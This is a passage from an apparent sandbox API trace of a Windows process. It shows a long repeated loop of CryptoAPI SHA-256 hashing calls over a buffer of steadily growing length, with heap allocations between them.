	[0192.663] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303340
	[0192.663] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303340, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303340, pdwDataLen=0x1283b0) returned 1
	[0192.663] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.663] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.663] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.664] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.664] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0192.664] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.664] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303368
	[0192.664] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303368, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303368, pdwDataLen=0x1283b0) returned 1
	[0192.664] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.664] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.664] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.665] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.665] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0192.665] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.665] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303390
	[0192.665] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303390, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303390, pdwDataLen=0x1283b0) returned 1
	[0192.665] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.665] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.665] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.666] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.666] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0192.666] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.666] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23033b8
	[0192.666] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23033b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23033b8, pdwDataLen=0x1283b0) returned 1
	[0192.666] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.666] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.666] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.666] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.666] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0192.667] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23033e0
	[0192.667] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23033e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23033e0, pdwDataLen=0x1283b0) returned 1
	[0192.667] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.667] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.667] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.667] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.667] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0192.667] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303408
	[0192.667] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303408, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303408, pdwDataLen=0x1283b0) returned 1
	[0192.667] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.668] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.668] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.668] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.668] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0192.668] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.668] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303430
	[0192.668] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303430, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303430, pdwDataLen=0x1283b0) returned 1
	[0192.668] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.668] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.668] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.669] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.669] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0192.669] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.669] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303458
	[0192.669] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303458, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303458, pdwDataLen=0x1283b0) returned 1
	[0192.669] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.669] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.669] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.670] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.670] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0192.670] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.670] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303480
	[0192.670] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303480, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303480, pdwDataLen=0x1283b0) returned 1
	[0192.670] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.670] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.670] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.671] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.671] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0192.671] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23034a8
	[0192.671] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23034a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23034a8, pdwDataLen=0x1283b0) returned 1
	[0192.671] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.671] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.671] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.671] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.671] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0192.671] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.671] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23034d0
	[0192.672] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23034d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23034d0, pdwDataLen=0x1283b0) returned 1
	[0192.672] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.672] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.672] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.672] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.672] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0192.672] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23034f8
	[0192.672] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23034f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23034f8, pdwDataLen=0x1283b0) returned 1
	[0192.672] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.672] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.672] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.673] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.673] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0192.673] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.673] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303520
	[0192.673] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303520, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303520, pdwDataLen=0x1283b0) returned 1
	[0192.673] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.673] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.673] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.674] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.674] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0192.674] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.674] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303548
	[0192.674] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303548, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303548, pdwDataLen=0x1283b0) returned 1
	[0192.674] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.674] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.674] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.675] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.675] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0192.675] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.675] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303570
	[0192.675] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303570, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303570, pdwDataLen=0x1283b0) returned 1
	[0192.675] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.675] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.675] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.675] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.675] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0192.676] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.676] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303598
	[0192.676] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303598, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303598, pdwDataLen=0x1283b0) returned 1
	[0192.676] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.676] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.676] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.676] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.676] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0192.676] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.676] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23035c0
	[0192.676] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23035c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23035c0, pdwDataLen=0x1283b0) returned 1
	[0192.676] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.676] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.676] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.677] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.677] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0192.677] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.677] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23035e8
	[0192.677] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23035e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23035e8, pdwDataLen=0x1283b0) returned 1
	[0192.677] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.677] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.677] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.678] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.678] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0192.678] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.678] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303610
	[0192.678] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303610, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303610, pdwDataLen=0x1283b0) returned 1
	[0192.678] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.678] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.678] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.679] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.679] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0192.679] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.679] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303638
	[0192.679] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303638, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303638, pdwDataLen=0x1283b0) returned 1
	[0192.679] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.679] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.679] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.680] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.680] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0192.680] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.680] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303660
	[0192.680] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303660, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303660, pdwDataLen=0x1283b0) returned 1
	[0192.680] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.680] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.680] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.681] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.681] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0192.681] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.681] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303688
	[0192.681] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303688, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303688, pdwDataLen=0x1283b0) returned 1
	[0192.681] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.681] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.681] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.681] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.681] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0192.681] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.682] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23036b0
	[0192.682] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23036b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23036b0, pdwDataLen=0x1283b0) returned 1
	[0192.682] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.682] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.682] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.682] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.682] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0192.682] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.682] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23036d8
	[0192.682] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23036d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23036d8, pdwDataLen=0x1283b0) returned 1
	[0192.682] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.682] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.682] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.683] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.683] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0192.683] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.683] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303700
	[0192.683] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303700, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303700, pdwDataLen=0x1283b0) returned 1
	[0192.683] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.683] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.683] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.684] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.684] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0192.684] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.684] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303728
	[0192.684] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303728, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303728, pdwDataLen=0x1283b0) returned 1
